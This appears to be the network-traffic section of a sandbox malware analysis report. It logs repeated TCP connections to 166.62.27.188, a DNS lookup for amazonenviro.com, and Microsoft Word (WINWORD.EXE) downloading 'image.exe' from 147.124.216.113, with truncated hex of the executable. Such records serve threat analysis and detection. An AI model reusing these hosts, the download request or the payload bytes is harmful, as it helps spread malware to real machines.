Jan 10, 2025 09:01:11.642554045 CET	50216	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.647469997 CET	80	50216	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.647552013 CET	50216	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.650198936 CET	50217	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.655144930 CET	80	50217	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:11.655249119 CET	50217	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.655401945 CET	50217	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:11.660409927 CET	80	50217	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.572865009 CET	80	50217	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.573299885 CET	80	50217	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.573390961 CET	50217	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.573497057 CET	50217	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.578351021 CET	80	50217	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.695677996 CET	50218	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.700841904 CET	80	50218	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.701025963 CET	50218	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.701345921 CET	50218	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.703969002 CET	50219	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.706252098 CET	80	50218	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.706331015 CET	50218	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.708863974 CET	80	50219	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:12.708951950 CET	50219	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.709110975 CET	50219	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:12.714392900 CET	80	50219	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.637475967 CET	80	50219	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.637548923 CET	80	50219	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.637643099 CET	50219	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.637720108 CET	50219	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.642965078 CET	80	50219	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.758707047 CET	50220	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.763999939 CET	80	50220	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.764225960 CET	50220	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.764501095 CET	50220	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.769623995 CET	80	50220	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.769696951 CET	50220	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.798228025 CET	50221	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.803416967 CET	80	50221	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:13.803522110 CET	50221	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.803654909 CET	50221	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:13.808487892 CET	80	50221	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.739552975 CET	80	50221	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.739744902 CET	80	50221	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.739814997 CET	50221	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.739902020 CET	50221	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.744885921 CET	80	50221	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.859719992 CET	50222	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.865233898 CET	80	50222	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.865612030 CET	50222	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.865830898 CET	50222	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.868279934 CET	50223	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.870810032 CET	80	50222	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.870894909 CET	50222	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.873203993 CET	80	50223	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:14.873318911 CET	50223	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.873559952 CET	50223	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:14.878441095 CET	80	50223	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.790632963 CET	80	50223	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.791369915 CET	80	50223	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.791538000 CET	50223	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.791538000 CET	50223	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.797167063 CET	80	50223	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.910861969 CET	50224	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.915991068 CET	80	50224	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.916075945 CET	50224	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.916198969 CET	50224	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.918301105 CET	50225	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.921241045 CET	80	50224	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.921318054 CET	50224	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.923155069 CET	80	50225	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:15.923219919 CET	50225	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.923348904 CET	50225	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:15.928309917 CET	80	50225	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.849894047 CET	80	50225	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.849946976 CET	80	50225	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.850006104 CET	50225	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.850219965 CET	50225	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.855114937 CET	80	50225	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.967502117 CET	50226	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.972779989 CET	80	50226	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.972878933 CET	50226	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.973010063 CET	50226	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.975272894 CET	50227	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.977932930 CET	80	50226	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.978003025 CET	50226	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.980201006 CET	80	50227	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:16.980273962 CET	50227	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.980406046 CET	50227	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:16.985229969 CET	80	50227	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:17.908380032 CET	80	50227	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:17.908442020 CET	80	50227	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:17.908597946 CET	50227	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:17.912404060 CET	50227	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:17.917258978 CET	80	50227	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:18.022324085 CET	50228	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.027715921 CET	80	50228	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:18.027815104 CET	50228	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.027975082 CET	50228	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.030658007 CET	50229	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.032998085 CET	80	50228	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:18.033061028 CET	50228	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.035589933 CET	80	50229	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:18.035671949 CET	50229	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.035800934 CET	50229	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:18.040687084 CET	80	50229	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.000243902 CET	80	50229	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.000307083 CET	80	50229	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.000519991 CET	50229	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.000519991 CET	50229	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.005851984 CET	80	50229	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.121855974 CET	50230	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.127629995 CET	80	50230	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.127875090 CET	50230	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.127953053 CET	50230	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.130645990 CET	50231	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.133054972 CET	80	50230	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.133131981 CET	50230	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.135601044 CET	80	50231	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:19.135714054 CET	50231	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.135947943 CET	50231	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:19.140831947 CET	80	50231	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.073010921 CET	80	50231	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.073077917 CET	80	50231	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.073283911 CET	50231	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.073380947 CET	50231	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.078507900 CET	80	50231	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.195987940 CET	50232	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.201706886 CET	80	50232	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.201822996 CET	50232	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.202007055 CET	50232	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.204653025 CET	50233	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.207031012 CET	80	50232	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.207115889 CET	50232	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.209589005 CET	80	50233	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:20.209681034 CET	50233	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.209860086 CET	50233	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:20.214857101 CET	80	50233	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.121885061 CET	80	50233	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.121942997 CET	80	50233	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.122051954 CET	50233	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.122139931 CET	50233	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.127409935 CET	80	50233	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.246680975 CET	50234	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.252485037 CET	80	50234	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.252803087 CET	50234	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.253329992 CET	50234	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.255280972 CET	50235	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.259212971 CET	80	50234	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.259335041 CET	50234	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.260325909 CET	80	50235	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:21.260446072 CET	50235	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.260569096 CET	50235	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:21.265923977 CET	80	50235	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.210985899 CET	80	50235	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.211177111 CET	80	50235	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.211292982 CET	50235	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.211528063 CET	50235	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.216437101 CET	80	50235	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.337227106 CET	50236	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.342612028 CET	80	50236	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.342727900 CET	50236	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.342910051 CET	50236	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.345264912 CET	50237	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.350629091 CET	80	50237	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.350718021 CET	50237	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.350897074 CET	50237	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:22.352155924 CET	80	50236	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.355811119 CET	80	50237	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.360740900 CET	80	50236	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:22.360949993 CET	50236	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.327714920 CET	80	50237	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.327806950 CET	80	50237	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.327891111 CET	50237	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.327992916 CET	50237	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.332848072 CET	80	50237	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.448820114 CET	50238	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.454057932 CET	80	50238	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.454308033 CET	50238	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.454413891 CET	50238	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.457017899 CET	50239	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.459500074 CET	80	50238	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.459593058 CET	50238	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.462090015 CET	80	50239	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:23.462183952 CET	50239	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.462342978 CET	50239	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:23.467204094 CET	80	50239	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.370398998 CET	80	50239	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.370455980 CET	80	50239	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.370872974 CET	50239	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.371120930 CET	50239	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.376388073 CET	80	50239	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.496170044 CET	50240	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.501511097 CET	80	50240	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.501600981 CET	50240	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.501801968 CET	50240	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.504704952 CET	50241	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.506867886 CET	80	50240	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.507008076 CET	50240	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.509663105 CET	80	50241	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:24.509768009 CET	50241	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.509913921 CET	50241	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:24.514766932 CET	80	50241	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.441354036 CET	80	50241	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.443972111 CET	80	50241	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.444221973 CET	50241	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.444221973 CET	50241	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.449254036 CET	80	50241	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.561877012 CET	50242	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.567460060 CET	80	50242	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.567938089 CET	50242	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.568304062 CET	50242	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.571369886 CET	50243	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.573396921 CET	80	50242	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.573652029 CET	50242	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.576415062 CET	80	50243	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:25.576719046 CET	50243	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.577210903 CET	50243	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:25.582180023 CET	80	50243	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.474482059 CET	80	50243	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.474674940 CET	80	50243	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.474778891 CET	50243	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.478663921 CET	50243	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.483747959 CET	80	50243	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.592550039 CET	50244	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.597841024 CET	80	50244	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.597964048 CET	50244	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.598016024 CET	50244	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.603030920 CET	80	50244	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.603101969 CET	50244	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.646172047 CET	50245	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.651258945 CET	80	50245	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:26.651384115 CET	50245	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.651557922 CET	50245	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:26.656440973 CET	80	50245	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.587016106 CET	80	50245	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.587045908 CET	80	50245	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.587264061 CET	50245	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.587265015 CET	50245	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.592143059 CET	80	50245	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.715821028 CET	50246	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.720866919 CET	80	50246	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.720963001 CET	50246	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.721200943 CET	50246	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.723706007 CET	50247	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.726073027 CET	80	50246	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.726165056 CET	50246	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.728653908 CET	80	50247	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:27.728821039 CET	50247	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.728924036 CET	50247	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:27.733767033 CET	80	50247	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:28.651297092 CET	80	50247	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:28.651402950 CET	80	50247	166.62.27.188	192.168.2.4
Jan 10, 2025 09:01:28.651597977 CET	50247	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:30.323971033 CET	50247	80	192.168.2.4	166.62.27.188
Jan 10, 2025 09:01:30.330790997 CET	80	50247	166.62.27.188	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 08:59:25.833151102 CET	50058	53	192.168.2.4	1.1.1.1
Jan 10, 2025 08:59:26.020203114 CET	53	50058	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 08:59:25.833151102 CET	192.168.2.4	1.1.1.1	0x9cde	Standard query (0)	amazonenviro.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 08:59:26.020203114 CET	1.1.1.1	192.168.2.4	0x9cde	No error (0)	amazonenviro.com		166.62.27.188	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

147.124.216.113

amazonenviro.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	147.124.216.113	80	7244	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 08:58:46.952234983 CET	182	OUT	GET /image.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
Jan 10, 2025 08:58:57.577908039 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 07 Jan 2025 08:16:47 GMT Accept-Ranges: bytes ETag: "65d1a17edc60db1:0" Server: Microsoft-IIS/8.5 Date: Fri, 10 Jan 2025 07:58:54 GMT Content-Length: 1161216 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@@Pn& \|TW.text `.itextH `.data@ @.bss6.idatan&P(@.tls4.rdata@@.reloc\|~@B.rsrc @@@@@
Jan 10, 2025 08:58:57.577927113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@
Jan 10, 2025 08:58:57.577936888 CET	448	IN	Data Raw: 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df Data Ascii: (z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD@,<xH9JtG!(G
Jan 10, 2025 08:58:57.578007936 CET	1236	IN	Data Raw: ff ff 23 50 fc 8b 0d 20 17 47 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 00 00 14 00 6a 00 e8 cd fc ff ff 85 c0 74 4d 8b 15 0c 17 47 00 8b c8 c7 01 08 17 47 00 a3 0c 17 47 00 89 51 04 89 02 8b d0 81 c2 00 00 14 00 Data Ascii: #P G)SjhhjtMGGGQ+ G+G[3 G3[=MGt4 jn7G3tjU7G3uSVWUNjhVj
Jan 10, 2025 08:58:57.578016996 CET	1236	IN	Data Raw: 50 fc f6 c2 07 89 c1 53 8a 1d 4d 10 47 00 0f 85 cb 00 00 00 84 db 8b 1a 75 61 83 6a 0c 01 8b 42 08 74 2c 85 c0 89 4a 08 8d 40 01 89 41 fc 74 07 31 c0 88 03 5b c3 90 8b 4b 04 89 5a 14 89 4a 04 89 51 14 89 53 04 c6 03 00 31 c0 5b c3 90 90 85 c0 74 Data Ascii: PSMGuajBt,J@At1[KZJQS1[tBJHA19SuCRMGp#tQRjZY#zQRjZY%Gt6jr%Gt j\Vu
Jan 10, 2025 08:58:57.578022003 CET	448	IN	Data Raw: 83 e9 18 39 ca 76 44 89 c8 c1 e9 02 01 c1 31 c0 29 d1 83 d0 ff 21 c8 01 d0 89 c3 52 e8 a2 f7 ff ff 5a 85 c0 74 22 81 fb 2c 0a 04 00 76 03 89 50 f8 8b 4e f8 89 c3 89 c2 89 f0 e8 d4 f4 ff ff 89 f0 e8 e5 fa ff ff 89 d8 5e 5b c3 d1 e9 39 ca 72 06 89 Data Ascii: 9vD1)!RZt",vPN^[9rP^[ct,vX^[1^[@SX$,sx[u3@= Gt
Jan 10, 2025 08:58:57.617119074 CET	1236	IN	Data Raw: 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 Data Ascii: 0000?000G_@SV^[USVE@;rM
Jan 10, 2025 08:58:57.617173910 CET	224	IN	Data Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 Data Ascii: GuGr7G7_u&GsGG[7GtG\|GXG3G)@(AG7G>FOGGG
